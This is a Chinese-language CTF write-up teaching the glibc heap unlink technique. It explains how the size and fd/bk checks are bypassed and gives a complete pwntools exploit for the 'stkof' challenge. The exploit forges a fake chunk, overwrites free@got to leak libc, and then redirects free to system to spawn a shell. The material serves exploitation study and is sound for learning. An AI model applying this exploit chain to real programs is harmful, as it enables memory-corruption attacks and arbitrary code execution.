Unlink

Principle

将堆块从双向链表(smallbin&unsortedbin)中取出时会合并，触发unlink操作，这个过程中存在漏洞（详情参考源码），有两个检查需要绕过

size检查
第一个要检查的是需要解链bin的size。在堆中有两个地方存储了p的size。第一个是当前p->size。第二个是next_chunk§->prev_size。比较两个大小。
fd和bk检查
检查p是否在双向链表中。在双向链表中有两个指针指向p。第一个是FD->bk，第二个是BK->fd。

Premise

存在small bin或unsorted bin大小的chunk

可以改写fd&bk指针

Exploit

1. UAF

利用条件

1. 存在UAF可以修改p的fd和bk
2. 存在一个指针指向p

利用方法

1. 通过UAF漏洞修改chunk0->fd=G_ptr-0x18，chunk0->bk=G_ptr-0x10，绕过fd和bk检查
2. free下一个chunk，chunk0和chunk1合并，chunk0发生unlink，修改了G_ptr的值

2. 堆指针可知

利用条件

1. 可以修改p的下一个chunk->pre_size和inuse位
2. 存在一个指针指向chunk p的内容部分

利用方法

1. 伪造fake_chunk。fakechunk->size=chunk0-0x10，可以绕过size检查。fakechunk->fd=&G_ptr-0x18，fakechunk->bk=&G_ptr-0x10，绕过fd和bk检查。
2. 修改下一个chunk的prev_size=chunksize§-0x10。因为fakechunk比chunk0小0x10。
3. 修改下一个chunk的inuse位。
4. free下一个堆块chunk1。fakechunk和chunk1合并，fakechunk发生unlink，修改了G_ptr的值。

Example

stkof

RELRO: Partial RELRO

PIE: No PIE (0x400000)

1–>add 2–>edit 3–>free 4–>check

2明显存在堆溢出，3指针置零且在bss段

利用思路：fake –> free chunk–>hijack free@got–>”free” ‘/bin/sh’

起手式

import requests
from pwn import *

p = process('./stkof')
elf = ELF('./stkof')
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
context.binary = elf
context.log_level = 'debug'

sda = lambda x,y:p.sendlineafter(x,y)
sdl = lambda x:p.sendline(x)
rct = lambda x:p.recvuntil(x)
prt = lambda x,y:log.info('\x1b[01;38;5;214m' + x + '==>' + hex(y) + '\x1b[0m')

def add(size):
    sdl('1')
    sdl(str(size))
    p.recvuntil('OK\n')

def edit(idx, content):
    sdl('2')
    sdl(str(idx))
    sdl(str(len(content)))
    p.send(content)
    p.recvuntil('OK\n')

def free(idx):
    sdl('3')
    sdl(str(idx))

先创建几个chunk看下堆布局

pwndbg> parseheap
addr                prev                size                 status              fd                bk                
0xe05000            0x0                 0x410                Used                None              None
0xe05410            0x0                 0x30                 Used                None              None
0xe05440            0x0                 0x410                Used                None              None
0xe05850            0x0                 0x30                 Used                None              None
0xe05880            0x0                 0x30                 Used                None              None

可以看见chunk0于chunk1间出现了一个大堆块，是由于未进行setbuf操作造成的

但是可以知道我们这里无法利用chunk0进行后续操作

pwndbg> x/10wx 0x00602140
0x602140:	0x00000000	0x00000000	0x00e05420	0x00000000
0x602150:	0x00e05860	0x00000000	0x00e05890	0x00000000

因此，这里我们可以选取0x602150

#fake fd&bk
heap = 0x602150
fd=heap-0x18
bk=heap-0x10

#fake chunk
payload =  p64(0)      #prev_size
payload += p64(0x20)   #size
payload += p64(fd)     #fd
payload += p64(bk)     #bk
payload += p64(0x20)   #next chunk's prev_size bypass the check
payload = payload.ljust(0x30, 'a')
payload += p64(0x30)   #fake next chunk's prev_size
payload += p64(0x90)   #fake next chunk's prev_inuse
edit(2, payload)       #fake chunk in chunk1

Before Edit

After Edit

Free chunk2 触发 unlink

可以看见chunks中原本指向chunk1的地方变成了chunk1-0x18，因此我们修改chunk

现在我们可以往bss端上写东西，也就是可以控制chunks中元素了

进一步地，我们把chunks[0]改成got，就能劫持got

payload2 = p64(0)*2+p64(free_got)+p64(puts_got)
edit(2, payload2)

我们能够随意调用的函数唯有free耳，故劫持free为puts用来打印got表可以实现leak

可以看见原本chunks[0]的地方变成了free@got，chunks[1]的地方变成了puts@got

#Overwrite free@got with puts@plt
edit(1, p64(puts_plt))
free(2)#puts(puts@got) leak libc
p.recvuntil('OK\n')
leak = u64(p.recvline('').ljust(8,'\x00'))
prt('puts@got',leak)
libc_base = leak - libc.sym['puts']
prt('libc_base',libc_base)

#Overwrite free@got with system@plt
system_plt = libc.sym['system']
shell = system_plt + libc_base
edit(4,'/bin/sh')
edit(1, p64(shell))

#Get shell
free(4)

p.interactive()